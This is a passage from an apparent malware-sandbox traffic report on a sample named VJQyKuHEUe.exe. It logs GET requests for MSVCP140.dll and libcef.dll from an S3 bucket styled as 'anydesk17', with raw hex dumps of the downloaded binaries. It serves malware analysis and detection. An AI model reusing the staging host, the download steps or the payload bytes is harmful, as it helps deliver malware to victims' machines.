45 00 00 64 86 06
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$9@W}!}!}!S!{!tYJv!}!N!{x!{z!{f!{|!{&|!{|!Rich}!PEd
                                                                                              2024-12-18 12:06:01 UTC579INData Raw: d8 72 00 00 00 00 00 00 c4 72 00 00 00 00 00 00 b0 72 00 00 00 00 00 00 92 72 00 00 00 00 00 00 76 72 00 00 00 00 00 00 62 72 00 00 00 00 00 00 4e 72 00 00 00 00 00 00 34 72 00 00 00 00 00 00 1e 72 00 00 00 00 00 00 08 72 00 00 00 00 00 00 ee 71 00 00 00 00 00 00 e0 71 00 00 00 00 00 00 c6 71 00 00 00 00 00 00 b4 71 00 00 00 00 00 00 a2 71 00 00 00 00 00 00 94 71 00 00 00 00 00 00 8a 71 00 00 00 00 00 00 7c 71 00 00 00 00 00 00 6e 71 00 00 00 00 00 00 62 71 00 00 00 00 00 00 3a 71 00 00 00 00 00 00 cc 70 00 00 00 00 00 00 dc 70 00 00 00 00 00 00 ee 70 00 00 00 00 00 00 1a 71 00 00 00 00 00 00 02 71 00 00 00 00 00 00 2a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 70 00 00 00 00 00 00 9a 70 00 00 00 00 00 00 62 70 00 00 00 00 00 00 7a 70 00 00 00 00 00
                                                                                              Data Ascii: rrrrvrbrNr4rrrqqqqqqq|qnqbq:qpppqq*qppbpzp
                                                                                              2024-12-18 12:06:02 UTC16384INData Raw: 6e 6f 77 6e 20 65 78 63 65 70 74 69 6f 6e 00 00 00 00 00 00 00 f8 64 00 80 01 00 00 00 b0 25 00 80 01 00 00 00 50 31 00 80 01 00 00 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 98 52 00 80 01 00 00 00 d8 52 00 80 01 00 00 00 18 53 00 80 01 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 66 00 69 00 62 00 65 00 72 00 73 00 2d 00 6c 00 31 00 2d 00 31 00 2d 00 31 00 00 00 00 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 73 00 79 00 6e 00 63 00 68 00 2d 00 6c 00 31 00 2d 00 32 00 2d 00 30 00 00 00 00 00 00 00 00 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00 00 00 00 00 00 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 00 00 00 00
                                                                                              Data Ascii: nown exceptiond%P1bad exceptionRRSapi-ms-win-core-fibers-l1-1-1api-ms-win-core-synch-l1-2-0kernel32api-ms-
                                                                                              2024-12-18 12:06:02 UTC1024INData Raw: 90 05 d7 e9 a3 9d b2 b0 ff e3 7a 2e 87 76 5f 3b f2 e2 f4 19 c8 11 3b fb 3a 17 cf aa 46 e3 52 84 39 07 85 b8 f5 0d 12 55 6d 05 2c ae 61 1c 28 0e 83 ec 48 c9 30 b9 f2 a1 82 3f cc 30 82 17 90 06 0a 2b 06 01 04 01 82 37 03 03 01 31 82 17 80 30 82 17 7c 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 17 6d 30 82 17 69 02 01 03 31 0f 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 30 82 01 52 06 0b 2a 86 48 86 f7 0d 01 09 10 01 04 a0 82 01 41 04 82 01 3d 30 82 01 39 02 01 01 06 0a 2b 06 01 04 01 84 59 0a 03 01 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 e7 03 93 4d 32 1f 2d 95 1f 30 4e 11 8b a0 2d cd 18 c5 2d 56 d1 3e 82 74 a9 a1 4d 70 aa 9c 30 2c 02 06 65 a0 07 e9 a2 c7 18 13 32 30 32 34 30 31 31 39 31 37 34 30 34 30 2e 36 34 39 5a 30 04 80 02 01 f4 a0 81 d1
                                                                                              Data Ascii: z.v_;;:FR9Um,a(H0?0+710|*Hm0i10`He0R*HA=09+Y010`He M2-0N--V>tMp0,e20240119174040.649Z0
                                                                                              2024-12-18 12:06:02 UTC10157INData Raw: dd 93 c8 e7 3e 50 e9 bb 7b dd ad 54 f1 e9 8d d8 3e 3a 67 f7 d5 32 d4 7f fa 28 bb 20 0e 27 f2 27 9f 68 a1 dc 04 8f d1 06 26 f8 01 50 8e 16 03 34 3b bc bb 33 1d c0 71 79 41 dc 2c b1 c3 5a f4 f5 52 19 e7 4b 74 32 e8 f6 32 fa 0e 83 c5 e0 d6 28 d3 a9 6f bc 44 2e 48 9f 48 9b 06 5f 04 62 f2 ff c8 69 13 b4 43 e1 ec 2f 24 a9 8c d7 eb 7a 79 0b 84 b1 35 e3 ac 63 36 5a 39 16 d7 c4 a0 51 9f 27 f9 5a 4b da e9 3a 02 10 e4 09 ad f9 e4 8e 77 d6 9d 09 92 aa 68 a2 7e dd 1e e2 d4 75 94 90 3b 8d 2a 99 52 10 ea a4 02 6a 7b c8 99 3a a6 36 01 3f ac f2 74 ae 0a f4 84 c3 c8 fe e4 75 4f f8 9a 2f 49 84 ab 86 ea 6a 4f b7 b1 af 08 f8 50 18 38 8f cf 0b b5 7e cc 47 a4 fa c7 72 5a d6 97 fa 77 5b 1a 5b ff 44 96 f9 99 06 86 9f c3 6e 9d b9 1f bc 70 f5 42 de 43 d2 b9 ad 30 e7 a4 60 ca bb 42
                                                                                              Data Ascii: >P{T>:g2( ''h&P4;3qyA,ZRKt22(oD.HH_biC/$zy5c6Z9Q'ZK:wh~u;*Rj{:6?tuO/IjOP8~GrZw[[DnpBC0`B
                                                                                              2024-12-18 12:06:02 UTC5216INData Raw: 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 c5 7d a9 39 ec ea 61 f6 fb b1 b6 5a 00 06 22 dc e9 e9 d3 fb 22 87 eb 5f 5b f8 e8 46 76 4c a1 80 dc e4 5f cd 0a 50 62 3f 8c 4a 8e 54 c5 78 4a ab 7f 50 f1 45 89 dc 76 b7 bb f6 48 44 e3 da d0 33 b9 52 ad 0d fa b6 1c 1a 6e f3 4b d9 d2 fc 90 0f 27 55 b7 83 03 2f 8b 49 48 aa a0 62 87 c2 c4 32 01 ad 6c c9 26 38 01 a2 52 9d 38 9c 75 ba dd 93 c8 e7 3e 50 e9 bb 7b dd ad 54 f1 e9 8d d8 3e 3a 67 f7 d5 32 d4 7f fa 28 bb 20 0e 27 f2 27 9f 68 a1 dc 04 8f d1 06 26 f8 01 50 8e 16 03 34 3b bc bb 33 1d c0 71 79 41 dc 2c b1 c3 5a f4 f5 52 19 e7 4b 74 32 e8 f6 32 fa 0e 83 c5 e0 d6 28 d3 a9 6f bc 44 2e 48 9f 48 9b 06 5f 04 62 f2 ff c8 69 13 b4 43 e1 ec 2f 24 a9 8c d7 eb 7a 79 0b 84 b1 35 e3
                                                                                              Data Ascii: 0*H0}9aZ""_[FvL_Pb?JTxJPEvHD3RnK'U/IHb2l&8R8u>P{T>:g2( ''h&P4;3qyA,ZRKt22(oD.HH_biC/$zy5


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.5497433.5.239.1464431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:06:04 UTC74OUTGET /MSVCP140.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:06:04 UTC446INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: X4Uemz/M3VXC4xteU5HMr3GUjh8YPoQJz9cSehePlTdXXRqiclhni3MwVNtlCkXYHu///ll032atkDPZNM6mojH7TtXtDybd
                                                                                              x-amz-request-id: 4CV81EDKFY6RTFZR
                                                                                              Date: Wed, 18 Dec 2024 12:06:05 GMT
                                                                                              Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                              ETag: "c1b066f9e3e2f3a6785161a8c7e0346a"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 627992
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              2024-12-18 12:06:04 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 b2 81 72 24 d3 ef 21 24 d3 ef 21 24 d3 ef 21 90 4f 00 21 26 d3 ef 21 2d ab 7c 21 32 d3 ef 21 76 bb ee 20 27 d3 ef 21 24 d3 ee 21 e1 d3 ef 21 76 bb ec 20 27 d3 ef 21 76 bb eb 20 6f d3 ef 21 76 bb ea 20 6a d3 ef 21 76 bb ef 20 25 d3 ef 21 76 bb 10 21 25 d3 ef 21 76 bb ed 20 25 d3 ef 21 52 69 63 68 24 d3 ef 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07
                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`r$!$!$!O!&!-|!2!v '!$!!v '!v o!v j!v %!v!%!v %!Rich$!PEd
                                                                                              2024-12-18 12:06:04 UTC578INData Raw: fd ff ff e9 80 00 00 00 4c 8b 7c 24 70 4c 8b f3 49 c1 e6 03 48 8b d7 4d 8b c6 49 8b cf 4f 8d 24 3e e8 9a 8e 04 00 f2 0f 10 16 8b d3 48 8b cf e8 80 fd ff ff 4c 8b ed 48 83 fd 01 7e 4b bd 01 00 00 00 f2 0f 10 04 ee 66 0f 2e 05 61 f4 04 00 7a 02 74 35 4d 8b c6 49 8b d7 49 8b cc e8 5f 8e 04 00 f2 0f 10 14 ee 8b d3 49 8b cc e8 44 fd ff ff 44 8b cb 4d 8b c4 8b d3 48 8b cf e8 bc fb ff ff 48 ff c5 49 3b ed 7c ba 48 8b 5c 24 50 48 8b c7 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 40 53 48 83 ec 20 66 41 0f 6e d0 48 8b d9 f3 0f e6 d2 e8 09 00 00 00 48 8b c3 48 83 c4 20 5b c3 48 8b c4 48 89 58 18 55 56 57 48 83 ec 30 33 ed 0f 29 70 d8 f2 0f 11 50 08 0f 28 f2 8b f2 48 8b d9 85 d2 0f 8e cf 00 00 00 83 fa 01 0f 84 c2 00 00 00 48 8d 50 08 48
                                                                                              Data Ascii: L|$pLIHMIO$>HLH~Kf.azt5MII_IDDMHHI;|H\$PHHl$XHt$`H A_A^A]A\_@SH fAnHHH [HHXUVWH03)pP(HHPH
                                                                                              2024-12-18 12:06:04 UTC16384INData Raw: fe 00 00 00 f2 0f 10 4d 10 66 0f 2f c1 76 13 0f 57 0d e8 f1 04 00 bb 01 00 00 00 f2 0f 11 4d 10 eb 03 0f b7 df f2 0f 10 05 49 a2 08 00 66 0f 2f c1 77 70 f2 0f 10 15 bb f1 04 00 66 0f 2f d1 76 2f f2 0f 59 c9 48 8d 15 72 f4 04 00 41 b8 07 00 00 00 0f 28 c1 0f 28 f1 e8 1d f6 ff ff f2 0f 59 75 10 0f 28 c8 f2 0f 59 ce f2 0f 58 4d 10 eb 33 f2 0f 10 05 0e a2 08 00 48 8d 4d 10 41 83 c8 ff 66 0f 2f c1 76 23 0f 28 ca e8 b0 f4 ff ff f2 0f 10 4d 10 f2 0f 10 05 53 f1 04 00 f2 0f 5e c1 f2 0f 5c c8 f2 0f 59 cf eb 2a 0f 28 cf e8 8d f4 ff ff 0f bf c8 85 c9 74 0c 83 f9 01 75 11 b9 08 00 00 00 eb 05 b9 10 00 00 00 e8 d0 e5 ff ff f2 0f 10 4d 10 66 85 db 74 07 0f 57 0d 1f f1 04 00 0f 28 c1 eb 3a f2 0f 10 45 10 eb 33 66 0f 2e 3d 7b f1 04 00 7a 16 75 14 b8 00 80 00 00 66 85 45
                                                                                              Data Ascii: Mf/vWMIf/wpf/v/YHrA((Yu(YXM3HMAf/v#(MS^\Y*(tuMftW(:E3f.={zufE
                                                                                              2024-12-18 12:06:04 UTC1024INData Raw: 81 c4 80 00 00 00 5d c3 cc cc cc cc cc cc 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b ca e8 4f ff ff ff 90 b8 01 00 00 00 48 83 c4 38 c3 48 89 5c 24 10 57 48 83 ec 20 48 83 61 08 00 49 8b f8 48 83 61 10 00 48 8b d9 c7 01 63 73 6d e0 c7 41 04 01 00 00 00 c7 41 18 04 00 00 00 c7 41 20 20 05 93 19 48 89 51 28 4d 85 c0 74 11 41 f6 00 10 74 0b 48 8b 02 48 8b 48 f8 48 8b 79 30 48 8d 54 24 30 48 89 7b 30 48 8b cf ff 15 57 93 04 00 48 89 44 24 30 48 89 43 38 48 85 ff 74 11 f6 07 08 75 05 48 85 c0 75 07 c7 43 20 00 40 99 01 48 8b c3 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc 40 55 48 81 ec 00 01 00 00 48 8d 6c 24 30 48 89 9d e8 00 00 00 48 89 b5 f0 00 00 00 48 89 bd f8 00 00 00 48 8b 05 be 62 08 00 48 33 c5 48 89 85 c0 00 00 00 48 8b f9 48 85 c9 75 1a 48 8d 4d 00 e8
                                                                                              Data Ascii: ]H8HD$ HOH8H\$WH HaIHaHcsmAAA HQ(MtAtHHHHy0HT$0H{0HWHD$0HC8HtuHuC @HH\$8H _@UHHl$0HHHHbH3HHHuHM
                                                                                              2024-12-18 12:06:05 UTC16384INData Raw: 24 20 48 89 03 48 89 53 08 48 85 d2 74 40 83 c8 ff f0 0f c1 42 08 83 f8 01 75 33 48 8b 5c 24 28 48 8b cb 48 8b 03 48 8b 00 ff 15 8f 93 04 00 83 c8 ff f0 0f c1 43 0c 83 f8 01 75 12 48 8b 4c 24 28 48 8b 01 48 8b 40 08 ff 15 70 93 04 00 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc 33 d2 e9 dd f7 ff ff cc cc cc cc cc cc cc cc cc 48 83 ec 28 e8 27 f2 ff ff 48 8b c8 e8 3f fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 02 4c 8b 01 48 89 01 4c 89 02 48 8b 42 08 4c 8b 41 08 48 89 41 08 4c 89 42 08 c3 cc cc cc 48 83 39 00 0f 95 c0 c3 cc cc cc cc cc cc cc cc 48 83 79 08 00 48 8d 05 fc b2 04 00 48 0f 45 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 54 41 55 41 56 48 83 ec 60 48 8d 6c 24 30 48 8b 05 ad 5e 08 00 48 33 c5 48 89 45
                                                                                              Data Ascii: $ HHSHt@Bu3H\$(HHHCuHL$(HH@pH0[3H('H?HLHLHBLAHALBH9HyHHEA@USVWATAUAVH`Hl$0H^H3HE
                                                                                              2024-12-18 12:06:05 UTC1024INData Raw: 8b 44 24 40 48 8b cb e8 b2 02 00 00 90 48 8b 54 24 48 48 83 fa 10 72 35 48 ff c2 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 97 51 04 00 cc e8 71 f8 03 00 48 83 67 10 00 48 83 67 18 00 0f 10 03 0f 11 07 0f 10 4b 10 0f 11 4f 10 48 83 63 10 00 be 0f 00 00 00 48 89 73 18 c6 03 00 48 83 63 10 00 48 89 73 18 c6 03 00 48 8b c7 48 8b 4c 24 50 48 33 cc e8 cc f7 03 00 48 83 c4 60 5f 5e 5b c3 cc cc cc cc 48 8b 41 40 33 d2 48 39 10 74 06 48 8b 41 58 8b 10 48 63 c2 c3 cc cc cc cc cc cc cc cc cc cc cc 48 8b 41 58 ff 08 48 8b 51 40 48 8b 02 48 8d 48 01 48 89 0a c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 8b 41 20 48 8b d9 85 c0 7e 0c 48 8b 49 18 ff 15 0e 50 04 00 eb 0b 79 09 48 8b 49
                                                                                              Data Ascii: D$@HHT$HHr5HHL$0HHrH'HIH+HHvQqHgHgKOHcHsHcHsHHL$PH3H`_^[HA@3H9tHAXHcHAXHQ@HHHH@SH A H~HIPyHI
                                                                                              2024-12-18 12:06:05 UTC1749INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 60 8b 41 14 83 e2 17 89 51 10 23 c2 75 06 48 83 c4 60 5b c3 a8 04 74 09 48 8d 1d 54 b3 04 00 eb 14 a8 02 48 8d 1d 61 b3 04 00 48 8d 05 72 b3 04 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 b7 19 00 00 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 57 d9 ff ff 48 8d 15 58 20 06 00 48 8d 4c 24 30 e8 3c 04 04 00 cc cc cc cc cc cc 40 53 48 83 ec 60 8b 41 14 83 e2 17 89 51 10 23 c2 74 07 45 84 c0 74 12 eb 06 48 83 c4 60 5b c3 33 d2 33 c9 e8 0d 04 04 00 cc a8 04 74 09 48 8d 1d d3 b2 04 00 eb 14 a8 02 48 8d 1d e0 b2 04 00 48 8d 05 f1 b2 04 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 36 19 00 00 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 d6 d8 ff ff 48 8d 15 d7 1f 06 00 48 8d 4c 24 30 e8 bb 03 04 00 cc cc cc cc cc e9
                                                                                              Data Ascii: @SH`AQ#uH`[tHTHaHrHDHL$ LHL$0HWHX HL$0<@SH`AQ#tEtH`[33tHHHHDHL$ 6LHL$0HHHL$0
                                                                                              2024-12-18 12:06:05 UTC16384INData Raw: 24 b0 00 00 00 49 8b c4 49 3b c5 0f 84 de 00 00 00 41 8a 02 3c 80 73 10 44 0f b6 c0 49 8d 42 01 48 89 03 e9 8c 00 00 00 3c c0 0f 82 20 01 00 00 44 0f b6 c0 3c e0 73 0c 41 83 e0 1f 41 b9 01 00 00 00 eb 2d 3c f0 73 0c 41 83 e0 0f 41 b9 02 00 00 00 eb 1d 3c f8 73 0c 41 83 e0 07 41 b9 03 00 00 00 eb 0d 41 83 e0 03 3c fc 45 1b c9 41 83 c1 05 49 8b d7 41 8d 49 01 49 2b d2 48 3b d1 7c 6f 49 ff c2 4c 89 13 41 8a 02 2c 80 3c 3f 0f 87 c4 00 00 00 41 0f b6 0a 41 8b c0 83 e1 3f c1 e0 06 41 ff c9 44 8b c1 44 0b c0 49 ff c2 4c 89 13 45 85 c9 7f d2 40 38 3e 75 13 c6 06 01 41 f6 46 14 04 74 09 41 81 f8 ff fe 00 00 74 4a 45 39 46 10 0f 82 81 00 00 00 49 8b 03 44 89 00 49 83 03 04 4c 8b 13 49 8b 03 4d 3b d7 0f 85 19 ff ff ff 49 3b ea 40 0f 94 c7 8b c7 4c 8d 5c 24 50 49 8b
                                                                                              Data Ascii: $II;A<sDIBH< D<sAA-<sAA<sAAA<EAIAII+H;|oILA,<?AA?ADDILE@8>uAFtAtJE9FIDILIM;I;@L\$PI
                                                                                              2024-12-18 12:06:05 UTC1024INData Raw: 10 ff 15 e2 08 04 00 90 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc cc 48 8d 05 89 d4 07 00 c3 cc cc cc cc cc cc cc cc 8b 05 7a d4 07 00 85 c0 78 04 ff c0 eb 05 b8 01 00 00 00 89 05 67 d4 07 00 c3 cc cc cc cc cc cc 48 83 ec 28 83 2d 55 d4 07 00 01 75 33 48 8b 0d ac f8 07 00 48 85 c9 74 05 e8 02 01 00 00 48 8b 0d a3 f8 07 00 48 85 c9 74 05 e8 f1 00 00 00 48 8b 0d 82 f8 07 00 48 85 c9 74 05 e8 e0 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 60 48 c7 44 24 20 fe ff ff ff 48 8b d9 48 8b 01 48 63 48 04 83 7c 19 10 00 75 48 f6 44 19 18 02 74 41 48 8b 4c 19 48 48 8b 01 48 8b 40 68 ff 15 17 08 04 00 83 f8 ff 75 2a 48 8b 03 48 63 50 04 48 03 d3 8b 4a 10 8b c1 83 c8 04 48 83 7a 48 00 0f 44 c8 83 e1 13 83 c9 04 89 4a 10 8b 42 14 23 c1
                                                                                              Data Ascii: H0[HzxgH(-Uu3HHtHHtHHtH(@SH`HD$ HHHcH|uHDtAHLHHH@hu*HHcPHJHzHDJB#
                                                                                              2024-12-18 12:06:05 UTC16384INData Raw: 50 8b 10 eb 02 33 d2 85 d2 7e 06 41 0f b6 00 eb 0d 48 8b 01 48 8b 40 30 ff 15 cb 04 04 00 83 f8 ff 74 06 41 88 46 09 eb 04 49 83 26 00 41 c6 46 08 01 41 8a 46 09 42 38 04 3f 75 0c b1 01 88 4c 24 20 eb 31 89 6c 24 24 48 8d 54 24 38 49 83 fd 10 48 0f 43 d3 b9 7f 00 00 00 4c 3b e1 41 0f b6 c4 0f 42 c8 88 0c 2a 48 8b 5c 24 38 4c 8b 6c 24 50 8a 4c 24 20 48 ff c5 48 3b ee 0f 82 0c ff ff ff 84 c9 0f 84 be fe ff ff 48 8b 54 24 28 49 8b ce e8 43 5d 00 00 84 c0 0f 85 a9 fe ff ff 49 ff c4 49 8b ce e8 8c 33 00 00 83 4c 24 24 ff e9 85 fe ff ff 48 8b cb e8 2e a9 03 00 8b 44 24 24 48 8b 4c 24 58 48 33 cc e8 bd a8 03 00 48 8b 9c 24 b8 00 00 00 48 83 c4 60 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 20 48 bb
                                                                                              Data Ascii: P3~AHH@0tAFI&AFAFB8?uL$ 1l$$HT$8IHCL;AB*H\$8Ll$PL$ HH;HT$(IC]II3L$$H.D$$HL$XH3H$H`A_A^A]A\_^]H\$Hl$Ht$WAVAWH H


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.54974952.95.161.334431472C:\Users\user\Desktop\VJQyKuHEUe.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:06:08 UTC72OUTGET /libcef.dll HTTP/1.1
                                                                                              Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                              2024-12-18 12:06:09 UTC426INHTTP/1.1 200 OK
                                                                                              x-amz-id-2: hnGJtKqRsc64KutWy3Z9R5gk5OIuK8jc4XnM0FXV7gHXw7/rDUDoD/rFKt/6uXaveNPmFGb9EZA=
                                                                                              x-amz-request-id: 08GJXMK4HC92T4HH
                                                                                              Date: Wed, 18 Dec 2024 12:06:09 GMT
                                                                                              Last-Modified: Sat, 07 Dec 2024 17:32:42 GMT
                                                                                              ETag: "d7b50924ab14320b946526eb3db6a08f"
                                                                                              x-amz-server-side-encryption: AES256
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Type: binary/octet-stream
                                                                                              Content-Length: 271126
                                                                                              Server: AmazonS3
                                                                                              Connection: close
                                                                                              2024-12-18 12:06:09 UTC16384INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 09 7c 54 d5 dd ff 7f 66 92 81 b0 25 11 09 06 50 3b 6a d0 b8 80 81 20 06 01 99 48 82 13 0d 10 21 48 44 34 09 c9 84 a4 26 99 71 16 08 b8 41 03 96 38 46 63 ab ad 5d 5c aa b6 5a 5b 5b 6a 7d 04 dc 1a 44 25 28 2a b8 b4 b8 54 a9 f5 d1 8b b1 16 77 6c ad f3 ff 7e cf 39 f7 ce 9d 25 88 ed f3 7b fd ff bf e7 ff 79 c3 99 7b ef d9 d7 ef 59 ef cd dc 25 3d 22 43 08 91 49 2a 16 13 62 b3 50 78 c4 d7 93 ef 10 22 fb 5b 0f 65 8b 07 86 3c 7b cc 66 47 e5 b3 c7 54 37 b7 84 dc 81 a0 7f 79 b0 be cd dd 50 df de ee 0f bb 97 f9 dc c1 48 bb bb a5 dd 5d 36 7f a1 bb cd df e8 9b 38 62 c4 d0 02 ed c7 8f 5b fd 1b de 18 e1 78 cd 54 7f 8a 7c ef b5 3d 74 bd b6 c3 f5 ea 2b f2 ea 7c f5 75 79 15 af b2 fe 4d 11 f5 7c 53 c4 a5 af e2 d5 3f 49 b7 e2 b5 9f 4b 7b 99
                                                                                              Data Ascii: |Tf%P;j H!HD4&qA8Fc]\Z[[j}D%(*Twl~9%{y{Y%="CI*bPx"[e<{fGT7yPH]68b[xT|=t+|uyM|S?IK{
                                                                                              2024-12-18 12:06:09 UTC598INData Raw: 6c ef 03 eb d5 58 fb 09 8a 50 f1 2a 1a 43 5d a3 fc fd 01 dd ff cc f6 7c 98 0c 3b 4b 0c 5d 30 28 c0 6e 78 ef f8 35 32 ff 07 a9 98 b6 b3 8b ee 47 ae a6 be 36 aa 9e c7 d1 fd f1 ab e3 e6 fc 7c 82 cd 7c c8 d8 41 62 ec 94 1c 31 36 38 7a ef a8 c0 e1 75 ec 2f c7 f3 22 b2 33 fb 32 ca b3 a8 ba ca f4 2f 70 56 39 72 06 89 1c 8a 7b 0e c5 9d fb 38 99 2e ee 9f a8 f0 1d 59 99 22 2b 98 19 c8 a8 a3 7c 1a 91 29 46 4c 19 22 46 90 5c 19 c2 e6 d4 8f 99 7e f3 1f 8f b9 8f d4 b2 a8 ba ca bc ab e2 be 23 4b 8c a2 7c 1b 45 f9 36 8a fc 1f 35 99 fa 91 3c 17 e5 d3 43 22 cf b1 59 0c 62 3b 32 7c 52 53 5c 22 67 a4 0a 5f 32 49 5d 02 f7 a6 f6 cf 3c 8f e8 21 fd cd a4 f6 a6 31 67 36 e8 39 94 39 7e e7 b1 4a dd 29 89 76 78 bc be 39 8d 3d 77 92 3d 66 6f 1a 7b 7b d3 d8 5b 13 51 d7 c2 5f a5 9a 71
                                                                                              Data Ascii: lXP*C]|;K]0(nx52G6||Ab168zu/"32/pV9r{8.Y"+|)FL"F\~#K|E65<C"Yb;2|RS\"g_2I]<!1g699~J)vx9=w=fo{{[Q_q
                                                                                              2024-12-18 12:06:09 UTC16384INData Raw: 90 fa 11 a9 ad a4 de 26 35 8c c6 7e 47 93 9a 48 6a 2e a9 7a 52 2b 48 75 93 ba 8d d4 26 52 7b 48 fd 8d d4 11 db 28 ff 48 cd 21 d5 4c aa 9b d4 6f 49 bd 44 ea 03 52 83 9f a0 bc 21 35 85 d4 39 a4 6a 49 85 49 75 91 ba 8d d4 03 a4 9e 26 f5 26 a9 8f 49 0d 7e 92 d2 4f 6a 22 a9 d9 a4 2e 22 d5 41 ea 7b a4 36 92 7a fe 49 fe 12 25 75 3c 4f 51 9a 49 15 93 5a 48 2a 48 ea 06 52 bf 25 f5 1c a9 f7 49 65 6c a7 7e 96 d4 04 52 67 93 aa 27 b5 9a d4 f7 49 fd 92 d4 a3 a4 76 93 7a 8f 14 0d f2 45 3e a9 53 48 79 48 5d 40 ea 52 52 37 93 da 44 6a 0f a9 bf 91 8a 91 ca de 41 f5 99 d4 74 52 f3 49 2d 25 75 29 a9 f5 a4 7e 48 ea 97 a4 1e 23 f5 2a a9 4f 48 8d 7a 9a d2 4f ea 1c 52 17 93 5a 41 ea 06 52 7d a4 be 20 55 f0 0c d5 a9 67 f8 54 34 e5 07 a9 c7 49 ed 22 f5 0e a9 ac 9d 42 9c 44 6a 36
                                                                                              Data Ascii: &5~GHj.zR+Hu&R{H(H!LoIDR!59jIIu&&I~Oj"."A{6zI%u<OQIZH*HR%Iel~Rg'IvzE>SHyH]@RR7DjAtRI-%u)~H#*OHzORZAR} UgT4I"BDj6
                                                                                              2024-12-18 12:06:09 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                              Data Ascii:
